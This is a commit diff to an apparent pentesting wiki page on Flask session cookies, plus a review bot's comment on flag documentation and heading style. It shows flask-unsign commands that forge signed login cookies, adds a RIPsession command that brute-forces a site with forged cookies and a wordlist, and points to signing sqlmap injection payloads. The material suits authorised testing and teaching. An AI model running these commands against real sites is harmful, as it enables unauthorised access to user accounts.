commit
e5cb7b75dc
@ -80,6 +80,15 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
|
|||||||
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
|
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### **RIPsession**
|
||||||
|
Command line tool to brute-force websites using cookies crafted with flask-unsign.
|
||||||
|
{% embed url="https://github.com/Tagvi/ripsession" %}
|
||||||
|
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
|
||||||
|
```
|
||||||
|
|
||||||
### SQLi in Flask session cookie with SQLmap
|
### SQLi in Flask session cookie with SQLmap
|
||||||
|
|
||||||
[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
|
[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
|
||||||
|
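Review bot: The added RIPsession example command passes five flags (`-u`, `-c`, `-s`, `-f`, `-w`) with no explanation, so a reader cannot tell from these lines which value is the signing secret, which cookie field is substituted from `wordlist.txt`, or what the `-f "user doesn't exist"` string is compared against. Add a sentence after the code block describing each flag, and say that `10.10.11.100`, `password123` and `changeMe` are placeholders. Style point: the new heading is written `### **RIPsession**` while the adjacent heading `### SQLi in Flask session cookie with SQLmap` carries no bold; drop the `**` so the headings in this section match.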